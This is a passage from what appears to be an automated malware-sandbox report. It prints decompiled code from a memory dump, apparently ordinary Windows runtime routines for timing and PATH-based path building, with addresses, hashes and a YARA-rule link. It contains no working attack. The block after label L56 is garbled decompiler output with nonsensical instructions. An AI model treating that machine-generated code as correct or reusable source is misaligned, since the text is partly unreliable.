				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xefd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00E27D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00ED8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00E49E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00E4B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00E4CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00E27D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00ED8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00E4AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xef8628; // 0x0
								_v68 = _t77;
								_t78 =  *0xef862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xef8628; // 0x0
							_t116 =  *0xef862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x00e2b94c
0x00e2b956
0x00e2b95c
0x00e2b95e
0x00e2b964
0x00e2b969
0x00e2b96d
0x00e2b96d
0x00e2b970
0x00e2b974
0x00e2b97a
0x00e2badf
0x00e2badf
0x00e2bae2
0x00e2bae4
0x00e2bae6
0x00e2baf0
0x00e72cb8
0x00e2baf6
0x00e2baf6
0x00e2baf6
0x00e2bafd
0x00e2bb1f
0x00e2bb1f
0x00e2baff
0x00e2bb00
0x00e2bb00
0x00e2bb03
0x00e2bb03
0x00e2bacb
0x00e2bacf
0x00e2bad0
0x00e2bad1
0x00e2badc
0x00e2badc
0x00e2b980
0x00e2b980
0x00e2b988
0x00e2b98b
0x00e2b98d
0x00e2b990
0x00e2b993
0x00e2b999
0x00e2b99b
0x00e2b9a1
0x00e2b9a5
0x00e2b9aa
0x00e2b9b0
0x00e2b9bb
0x00e2b9c0
0x00e2b9c3
0x00e2b9ca
0x00e2b9cc
0x00e2b9cf
0x00e2b9d3
0x00e2b9d7
0x00e2ba94
0x00e2ba94
0x00e2ba98
0x00e2baa3
0x00e72ccb
0x00e2baa9
0x00e2baa9
0x00e2baa9
0x00e2bab1
0x00e72cd5
0x00e72cdd
0x00e72cdd
0x00e2babb
0x00e2babc
0x00e2bac2
0x00e2bac3
0x00e2bac3
0x00e2bac6
0x00000000
0x00e2b9dd
0x00e2b9dd
0x00e2b9e7
0x00e2b9e7
0x00e2b9ec
0x00e2b9ec
0x00e2b9f1
0x00e2b9f5
0x00e2b9fa
0x00e2ba00
0x00e2ba0c
0x00e2ba10
0x00e2ba10
0x00e2ba12
0x00e2ba18
0x00000000
0x00000000
0x00e2bb26
0x00e2bb26
0x00e2ba1e
0x00e2ba1e
0x00e2ba23
0x00e2ba25
0x00e2ba2c
0x00e2ba30
0x00e2ba35
0x00e2ba35
0x00e2ba41
0x00e2ba46
0x00e2ba4c
0x00e2ba50
0x00e2ba54
0x00e2ba6a
0x00e2ba6e
0x00e2ba70
0x00e2ba74
0x00e2ba78
0x00e2ba7a
0x00e2ba7c
0x00e2ba8e
0x00e2ba90
0x00e2ba92
0x00e2bb14
0x00e2bb14
0x00e2bb16
0x00e2bb16
0x00000000
0x00e2ba7c
0x00e2bb0a
0x00e2bb0d
0x00000000
0x00000000
0x00000000
0x00e2bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2B9A5

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 457500cdb648856e21f68854cec05baf326f2b73434e8756ce89b96bb351b9cd
Instruction ID: de82998e85105e7edc2aa8c49b278534b2f90171f6b352366c4a8b1d0c87cda3
Opcode Fuzzy Hash: 457500cdb648856e21f68854cec05baf326f2b73434e8756ce89b96bb351b9cd
Instruction Fuzzy Hash: C45159B1A08310CFC720CF29D48092ABBE5FB88714F24996EF695A7355DB31EC44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E32581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00E32581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546911967) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t234;
				signed int _t238;
				void* _t239;
				void* _t240;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				signed int _t274;
				signed int _t276;
				void* _t279;
				void* _t282;
				signed int _t283;
				unsigned int _t286;
				signed int _t290;
				void* _t291;
				signed int _t292;
				signed int _t296;
				intOrPtr _t308;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t325;
				signed int _t328;
				signed int _t330;
				signed int _t333;
				void* _t334;
				void* _t336;

				_t330 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0xefd360 ^ _t330;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t324 = 0xefb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t286 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t274 = 0x48;
				_t306 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t317 = 0;
				_v37 = _t306;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t325 = 0xc0000106;
						goto L32;
					} else {
						_t324 = L00E24620(_t286,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t324;
						__eflags = _t324;
						if(_t324 == 0) {
							_t325 = 0xc0000017;
							goto L32;
						} else {
							 *(_t324 + 0x44) =  *(_t324 + 0x44) & 0x00000000;
							_t50 = _t324 + 0x48; // 0x48
							_t319 = _t50;
							_t306 = _v32;
							 *(_t324 + 0x3c) = _t274;
							_t276 = 0;
							 *((short*)(_t324 + 0x30)) = _v48;
							__eflags = _t306;
							if(_t306 != 0) {
								 *(_t324 + 0x18) = _t319;
								__eflags = _t306 - 0xef8478;
								 *_t324 = ((0 | _t306 == 0x00ef8478) - 0x00000001 & 0xfffffffb) + 7;
								E00E4F3E0(_t319,  *((intOrPtr*)(_t306 + 4)),  *_t306 & 0x0000ffff);
								_t306 = _v32;
								_t334 = _t334 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t319 = _t319 + (( *_t306 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E00E939F2(_t319);
									_t306 = _v32;
									_t319 = _t268;
								}
							}
							_t290 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t325 = _v68;
								__eflags = 0;
								 *((short*)(_t319 - 2)) = 0;
								goto L32;
							} else {
								_t274 = _t324 + _t276 * 4;
								_v56 = _t274;
								do {
									__eflags = _t306;
									if(_t306 != 0) {
										_t234 =  *(_v60 + _t290 * 4);
										__eflags = _t234;
										if(_t234 == 0) {
											goto L30;
										} else {
											__eflags = _t234 == 5;
											if(_t234 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t274 =  *(_v60 + _t290 * 4);
										 *(_t274 + 0x18) = _t319;
										_t238 =  *(_v60 + _t290 * 4);
										__eflags = _t238 - 8;
										if(_t238 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t238 * 4 +  &M00E32959))) {
												case 0:
													__ax =  *0xef8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00E4F3E0(__edi,  *0xef848c, __ax & 0x0000ffff);
														__eax =  *0xef8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00E4F3E0(_t319, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0xef8480 & 0x0000ffff = E00E4F3E0(__edi,  *0xef8484,  *0xef8480 & 0x0000ffff);
													__eax =  *0xef8480 & 0x0000ffff;
													__eax = ( *0xef8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00E4F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00E4F3E0(_t319, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t319 = _t319 + (_t263 >> 1) * 2 + 2;
													__eflags = _t319;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t319 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx =  *0xef575c;
													__eflags = __ebx - 0xef575c;
													if(__ebx != 0xef575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00E4F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xef575c;
														} while (__ebx != 0xef575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xef8478 & 0x0000ffff = E00E4F3E0(__edi,  *0xef847c,  *0xef8478 & 0x0000ffff);
													__eax =  *0xef8478 & 0x0000ffff;
													__eax = ( *0xef8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00E939F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xef6e58 & 0x0000ffff = E00E4F3E0(__edi,  *0xef6e5c,  *0xef6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xef6e58 & 0x0000ffff;
													__eax = ( *0xef6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t290 = _v16;
													_t306 = _v32;
													L29:
													_t274 = _t274 + 4;
													__eflags = _t274;
													_v56 = _t274;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t290 = _t290 + 1;
									_v16 = _t290;
									__eflags = _t290 - _v48;
								} while (_t290 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t238 =  *(_v60 + _t317 * 4);
						if(_t238 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t238 * 4 +  &M00E32935))) {
							case 0:
								__ax =  *0xef8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t306 =  &_v64;
								_v80 = E00E32E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xef8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xef8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00E1EEF0(0xef79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00E1EB70(__ecx, 0xef79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t212 = _v72;
											__eflags = _t212;
											if(_t212 != 0) {
												L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
											}
											_t213 = _v52;
											__eflags = _t213;
											if(_t213 != 0) {
												__eflags = _t325;
												if(_t325 < 0) {
													L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
													_t213 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t286 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xef7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00E24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00E1EB70(__ecx, 0xef79a0);
										__eax = _v52;
										L36:
										_pop(_t318);
										_pop(_t326);
										__eflags = _v8 ^ _t330;
										_pop(_t275);
										return E00E4B640(_t213, _t275, _v8 ^ _t330, _t306, _t318, _t326);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t306 =  &_v36;
									_t272 = E00E32E3E(_t270,  &_v36);
									_t286 = _v36;
									_v76 = _t272;
								}
								if(_t286 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t286;
								}
								goto L14;
							case 6:
								__eax =  *0xef5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xef8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xef8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xef6e58 & 0x0000ffff;
								__eax = ( *0xef6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t317 = _t317 + 1;
								if(_t317 >= _v48) {
									goto L16;
								} else {
									_t306 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t291 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("jecxz 0x2");
					asm("o16 sub bl, ah");
					_t239 = _t238 + _t238;
					asm("daa");
					asm("jecxz 0x2");
					asm("jecxz 0x4");
					_t327 = _t324 + 1;
					 *0x1f00e326 =  *0x1f00e326 + _t239;
					_pop(_t279);
					asm("out 0x0, eax");
					_t240 = _t334;
					_t336 = _t239;
					 *0x200e75b =  *0x200e75b + _t306;
					 *((intOrPtr*)(_t240 - 0x9ff1cd8)) =  *((intOrPtr*)(_t240 - 0x9ff1cd8)) + _t240;
					asm("daa");
					asm("jecxz 0x2");
					_push(ds);
					_t282 = _t279 - _t240 - _t336 - _t240;
					 *((intOrPtr*)(_t324 + 0x29)) =  *((intOrPtr*)(_t324 + 0x29)) + _t291;
					asm("jecxz 0x2");
					asm("daa");
					asm("jecxz 0x2");
					asm("fcomp dword [ebx-0x19]");
					 *((intOrPtr*)(_t240 +  &_a1546911967)) =  *((intOrPtr*)(_t240 +  &_a1546911967)) + _t306;
					asm("out 0x0, eax");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xedff00);
					E00E5D08C(_t282, _t319, _t327);
					_v44 =  *[fs:0x18];
					_t320 = 0;
					 *_a24 = 0;
					_t283 = _a12;
					__eflags = _t283;
					if(_t283 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t328 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t296 = _t245 * 0xc;
							_v48 = _t296;
							__eflags = _t283 -  *((intOrPtr*)(_t296 + 0xde1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E00E4E5C0(_a8,  *((intOrPtr*)(_t296 + 0xde1668)), _t283);
									_t336 = _t336 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t328 = E00E851BE(_t283,  *((intOrPtr*)(_v48 + 0xde166c)), _a16, _t320, _t328, __eflags, _a20, _a24);
										_v52 = _t328;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t328;
						__eflags = _t328;
						if(_t328 < 0) {
							__eflags = _t328 - 0xc0000100;
							if(_t328 == 0xc0000100) {
								_t292 = _a4;
								__eflags = _t292;
								if(_t292 != 0) {
									_v36 = _t292;
									__eflags =  *_t292 - _t320;
									if( *_t292 == _t320) {
										_t328 = 0xc0000100;
										goto L76;
									} else {
										_t308 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t308 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t292;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t292) {
											__eflags =  *(_t308 + 0x1c);
											if( *(_t308 + 0x1c) == 0) {
												L106:
												_t328 = E00E32AE4( &_v36, _a8, _t283, _a16, _a20, _a24);
												_v32 = _t328;
												__eflags = _t328 - 0xc0000100;
												if(_t328 != 0xc0000100) {
													goto L69;
												} else {
													_t320 = 1;
													_t292 = _v36;
													goto L75;
												}
											} else {
												_t250 = E00E16600( *(_t308 + 0x1c));
												__eflags = _t250;
												if(_t250 != 0) {
													goto L106;
												} else {
													_t292 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t328 = E00E32C50(_t292, _a8, _t283, _a16, _a20, _a24, _t320);
											L76:
											_v32 = _t328;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00E1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t328 = _a24;
									_t257 = E00E32AE4( &_v36, _a8, _t283, _a16, _a20, _t328);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E00E32C50(_v36, _a8, _t283, _a16, _a20, _t328, 1);
									}
									_v8 = _t320;
									E00E32ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t328;
					}
					L70:
					return E00E5D0D1(_t243);
				}
				L108:
			}

0x00e32584
0x00e32586
0x00e32590
0x00e32596
0x00e32597
0x00e32598
0x00e32599
0x00e3259e
0x00e325a4
0x00e325a9
0x00e325ac
0x00e325ae
0x00e325b1
0x00e325b2
0x00e325b5
0x00e325b8
0x00e325bb
0x00e325bc
0x00e325bf
0x00e325c2
0x00e325c5
0x00e325c6
0x00e325cb
0x00e325ce
0x00e325d8
0x00e325dd
0x00e325de
0x00e325e1
0x00e325e3
0x00e325e9
0x00e326da
0x00e326da
0x00e326dd
0x00e326e2
0x00e75b56
0x00000000
0x00e326e8
0x00e326f9
0x00e326fb
0x00e326fe
0x00e32700
0x00e75b60
0x00000000
0x00e32706
0x00e32706
0x00e3270a
0x00e3270a
0x00e3270d
0x00e32713
0x00e32716
0x00e32718
0x00e3271c
0x00e3271e
0x00e75b6c
0x00e75b6f
0x00e75b7f
0x00e75b89
0x00e75b8e
0x00e75b93
0x00e75b96
0x00e75b9c
0x00e75ba0
0x00e75ba3
0x00e75bab
0x00e75bb0
0x00e75bb3
0x00e75bb3
0x00e75ba3
0x00e32724
0x00e32726
0x00e32729
0x00e3272c
0x00e3279d
0x00e3279d
0x00e327a0
0x00e327a2
0x00000000
0x00e3272e
0x00e3272e
0x00e32731
0x00e32734
0x00e32734
0x00e32736
0x00e75bc1
0x00e75bc1
0x00e75bc4
0x00000000
0x00e75bca
0x00e75bca
0x00e75bcd
0x00000000
0x00e75bd3
0x00000000
0x00e75bd3
0x00e75bcd
0x00e3273c
0x00e3273c
0x00e32742
0x00e32747
0x00e3274a
0x00e3274d
0x00e32750
0x00000000
0x00e32756
0x00e32756
0x00000000
0x00e32902
0x00e32908
0x00e3290b
0x00000000
0x00e32911
0x00e3291c
0x00e32921
0x00000000
0x00e32921
0x00000000
0x00000000
0x00e32880
0x00e32887
0x00e3288c
0x00000000
0x00000000
0x00e32805
0x00e3280a
0x00e32814
0x00e32816
0x00000000
0x00000000
0x00e3281e
0x00e32821
0x00e32823
0x00000000
0x00e32829
0x00e32829
0x00e32831
0x00e3283c
0x00e3283e
0x00000000
0x00e3283e
0x00000000
0x00000000
0x00e3284e
0x00e32850
0x00e32851
0x00e32854
0x00e32857
0x00e3285a
0x00e3285c
0x00e3285d
0x00000000
0x00000000
0x00e3275d
0x00e32761
0x00000000
0x00e32767
0x00e3276e
0x00e32773
0x00e32773
0x00e32776
0x00e32778
0x00e3277e
0x00e3277e
0x00e32781
0x00e32781
0x00e32783
0x00e32784
0x00000000
0x00000000
0x00e75bd8
0x00e75bde
0x00e75be4
0x00e75be6
0x00e75be8
0x00e75be9
0x00e75bee
0x00e75bf8
0x00e75bff
0x00e75c01
0x00e75c04
0x00e75c07
0x00e75c0b
0x00e75c0d
0x00e75c0d
0x00e75c15
0x00e75c18
0x00e75c1b
0x00e75c1b
0x00e75c1e
0x00000000
0x00000000
0x00e328c3
0x00e328c8
0x00e328d2
0x00e328d4
0x00e328d8
0x00e328db
0x00e75c26
0x00e75c28
0x00e75c2d
0x00e75c2d
0x00000000
0x00000000
0x00e75c34
0x00e75c36
0x00e75c49
0x00e75c4e
0x00e75c54
0x00e75c5b
0x00e75c5d
0x00e75c60
0x00e32788
0x00e32788
0x00e3278b
0x00e3278e
0x00e3278e
0x00e3278e
0x00e32791
0x00000000
0x00000000
0x00e32756
0x00e32750
0x00000000
0x00e32794
0x00e32794
0x00e32795
0x00e32798
0x00e32798
0x00000000
0x00e32734
0x00e3272c
0x00e32700
0x00e325ef
0x00e325ef
0x00e325ef
0x00e325f2
0x00e325f8
0x00000000
0x00000000
0x00e325fe
0x00000000
0x00e328e6
0x00e328ec
0x00e328ef
0x00e328f5
0x00e328f8
0x00e328f8
0x00000000
0x00e328f8
0x00000000
0x00000000
0x00e32866
0x00e32866
0x00e32876
0x00e32879
0x00000000
0x00000000
0x00e327e0
0x00e327e7
0x00e327e9
0x00e327eb
0x00e75afd
0x00000000
0x00e75afd
0x00000000
0x00000000
0x00e32633
0x00e32638
0x00e3263b
0x00e3263c
0x00e3263e
0x00e32640
0x00e32642
0x00e32647
0x00e32649
0x00e3264e
0x00e32650
0x00e32653
0x00e32659
0x00e326a2
0x00e326a7
0x00e326ac
0x00e326b2
0x00e75b11
0x00e75b15
0x00e75b17
0x00000000
0x00e326b8
0x00e326b8
0x00e326ba
0x00e327a6
0x00e327a6
0x00e327a9
0x00e327ab
0x00e327b9
0x00e327b9
0x00e327be
0x00e327c1
0x00e327c3
0x00e327c5
0x00e327c7
0x00e75c74
0x00e75c79
0x00e75c79
0x00e327c7
0x00000000
0x00e326c0
0x00e326c0
0x00e326c3
0x00e326c6
0x00e326c6
0x00e326c9
0x00e326c9
0x00000000
0x00e326c9
0x00e326ba
0x00e3265b
0x00e3265b
0x00e3265e
0x00e32667
0x00e3266d
0x00e32677
0x00e3267c
0x00e3267f
0x00e32681
0x00e75b49
0x00e75b4e
0x00e327cd
0x00e327d0
0x00e327d1
0x00e327d2
0x00e327d4
0x00e327dd
0x00e32687
0x00e32687
0x00e3268a
0x00e3268b
0x00e3268e
0x00e3268f
0x00e32691
0x00e32696
0x00e32698
0x00e3269d
0x00e3269f
0x00000000
0x00e3269f
0x00e32681
0x00000000
0x00000000
0x00e32846
0x00000000
0x00000000
0x00e32605
0x00e3260a
0x00e3260c
0x00e32611
0x00e32616
0x00e32619
0x00e32619
0x00e3261e
0x00000000
0x00e32624
0x00e32627
0x00e32627
0x00000000
0x00000000
0x00e75b1f
0x00000000
0x00000000
0x00e32894
0x00e3289b
0x00e3289d
0x00e328a1
0x00e75b2b
0x00e75b2e
0x00e75b2e
0x00e328a7
0x00e328a9
0x00e75b04
0x00e75b09
0x00e75b09
0x00e75b09
0x00000000
0x00000000
0x00e75b35
0x00e75b3c
0x00e328fb
0x00e328fb
0x00e326cc
0x00e326cc
0x00e326d0
0x00000000
0x00e326d2
0x00e326d2
0x00000000
0x00e326d2
0x00000000
0x00000000
0x00e325fe
0x00e3292d
0x00e3292f
0x00e32930
0x00e32935
0x00e32937
0x00e32939
0x00e3293c
0x00e3293e
0x00e3293f
0x00e32941
0x00e32945
0x00e32948
0x00e3294e
0x00e3294f
0x00e32951
0x00e32951
0x00e32954
0x00e3295c
0x00e32962
0x00e32963
0x00e32965
0x00e32966
0x00e32968
0x00e3296b
0x00e3296e
0x00e3296f
0x00e32971
0x00e32974
0x00e3297b
0x00e3297d
0x00e3297e
0x00e3297f
0x00e32980
0x00e32981
0x00e32982
0x00e32983
0x00e32984
0x00e32985
